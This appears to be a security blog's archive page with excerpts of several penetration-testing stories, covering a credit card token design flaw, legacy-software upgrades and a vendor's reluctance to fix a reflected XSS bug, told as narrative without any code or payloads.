Upon hearing about some of the new features in iOS 10, I decided to check it out using the Apple Beta Software Program. There are many new features ripe for the testing, but one particular feature caught my eye: rich links in iMessages. Essentially, when you receive a URL in an iMessage, your iPhone will attempt to retrieve the website to give you a little preview.
Today, we will be taking a look at another reason to perform a web application penetration test: padding a business-case for upgrading end-of-life or legacy software. The company I worked for at the time needed to manage their telephone number inventory, while enabling legislative compliance. It was time to update the in-place solution as it was slow, outdated, and had some very specific requirements that made it very hard to work with, but no one wanted to foot the bill for the update. Continue reading “XSS Doesn’t Live Here Anymore”
Today’s post does not involve vendor-shaming! It does, however, involve credit cards, design mistakes, and the potential to rip off customers. We were implementing pre-authorized credit card billing, and in a typical fashion, the project brought us on late in the game.
To understand the issue at hand, you’ll have to understand the proposed solution. There were three systems involved: the Customer Information system (CI), the Bill Management system (BM), and the Payment Vendor system (PV). The PV is responsible for storing credit cards in a secure manner, which is referenced by our BM using a token, and is also responsible for completing all the actual payment tasks like charging the credit card. The CI is responsible for storing the customer’s details, including the aforementioned token. The BM stores information like how much a customer pays each month and their billing date. On the billing date, the BM grabs the token from the CI and submits it, along with the bill total, to the PV.
Now, this solution looks okay on paper. The problem arises when you see how the token initially got from the PV to the CI. When a customer wanted to register for pre-authorized billing, they had two options: 1) do it through the online self-serve, or 2) call in to an agent. The agent used a desktop application, which did a fair job automating the process. Essentially, the agent just had to enter the credit card information into the application. The application would then make the necessary calls to the PV to save the credit card and get a token, and then make the call to the CI to save the token to the customer’s account.
The problem with this flow was that the agent not only had visibility into the customer’s token, which could be used to charge money to their credit card, but that the agent also had permissions in the CI to arbitrarily write tokens to accounts! This means that if I added a token to an account, I could just as easily repeat the call to the CI to add the same token to anyone else’s account. Effectively, this means one customer could be paying multiple customer’s bills!
Now, if the project team had involved us earlier, perhaps in the design phase, we may have caught this issue before it was written into the application. We could have advised the project that this would be the perfect use case for an intermediary service, one that would handle the calls to the PV and the CI behind the curtain, hiding the inner workings from the agents. Unfortunately, we were brought on late and so the project had to take on additional work and redo completed work, as customer security is priority #1.
The morals of the story: 1) Not all vulnerabilities are code issues, it helps to step back and look at the design, and 2) Involve your testing team early, not just in development/implementation phase but also in the design phase, as you can save yourself from having to start over later.
In keeping with the vendor-theme, this next story is about a company that we will call Fortune-Teller (FT). FT has software in every device you own, whether you use Apple iOS/OSX, Android Phones, Windows PCs, Linux, etc. They are everywhere, and the guy who started the company looks like he could be the villain in the next Die Hard movie. I am not sure if there is a moral to this story, or if I am just sharing it so people can start to see how “these things go”, as they say. In either case, lets get started. Continue reading “Stop! Vendor Time!”
Today’s post is spawned from a tale similar to the last post, in that it deals with the subject matter of vendors and issues found in their software.
This “The Vendor” sells a provisioning platform that allows systems that need to provision services (like Order Management, Order Entry, etc.) to communicate with engineering systems using a more standardized API. The need arises partially from the fact that most engineering systems (phone switches, DACs, CMTS systems, etc.) use uncommon or low-level methods of communication to provision services and equipment which are not easy to implement in a high-level system like a web application. The Vendor solves this by allowing other applications to send HTTP requests, which it then translates into the various messages and protocols that the downstream systems understand. There is much more to it than that, but that is the simple explanation. The Vendor has their solution in over 500 companies globally, including many major ISPs, telecom companies, and the US government.
This story takes place some time in mid-2014. The company I worked for was installing a new instance of The Vendor’s solution and wanted our team to perform some testing on it. As we started testing, we were quickly finding issues all over the place. Reflected XSS on the login page, invalided redirects allowing for phishing attempts, virtually no logging capabilities or password lockouts, and more. So, as we always do, we informed the project team and the vendor.
In my experience (and sadly so), the response from vendors when reporting a vulnerability is more often than not a negative one. It seems to be a common theme, which is really too bad. In a perfect world vendors would welcome external security testing, as it helps them offer their customers the most secure software they can. The more eyes looking for problems, the more likely the problems will be found. In this case, the vendor pushed back above and beyond the average.
The issue with the highest risk (and the first issue found) was the XSS, and so I will focus on that in this post. At first, The Vendor denied the issue. This is the common first stage in the bug-grief process. As demonstrated in my previous post, there are a number of methods that can be used to work through this change: try different verbiage, describe the issue from a different point of view, explain the business or technical impacts, or give a real-life demonstration. The Vendor wouldn’t move out of the denial stage without a fight, and so we had to build a demonstration.
Our initial demo involved inserting an image of the power rangers onto the login page. While an awesome demo in theory, the non-‘evil minded’ developers at The Vendor did not see the risk. “Who cares if you can put images on the login page?” was the reply we received, despite explaining that running code is running code regardless of it being an image or a cookie-stealing script. Back to the drawing board.
We brought this full-featured demo back to The Vendor’s developers, walked them through the login process, and showed them the stolen credentials. After playing around a bit themselves, we finally had acceptance of the issue. For most, the logical thing to do would be to fix the issue that we all agree 1) exists, and 2) is a risk. In The Vendor’s case, the ‘logical’ thing to do was to write up a level-of-effort (LoE) & quote, effectively offering to ‘sell’ the fix to us.
This is the opposite of what a vendor should do. If a customer finds a security vulnerability in your software, do not attempt to charge them for a fix. You should instead fix the issue and thank your customer for assisting you in developing a better product for all your other customers.
In the end, we found other ways to mitigate the risk, but this shouldn’t have been necessary. The moral of the story: don’t rely on a vendor to give a fix, even if they understand the issue and the risk. Sometimes you need to find a way to mitigate the risk on your own.
Note: Seeing as I intentionally withheld the vendor’s name, please do not guess it in the comments section below. Also of note: Eventually, the vendor did publish a fix, but as always it is up to the customer to stay up to date on patches. Please make sure you patch often!
Two years ago, we discovered an issue in a certain vendor’s software (that has since been fixed). For legal reasons, I cannot disclose the name of the vendor, so let’s just call them The Vendor. The Vendor provides an out of the box Back Office solution to telecom companies across the world, and are one of the “industry standards” in their space.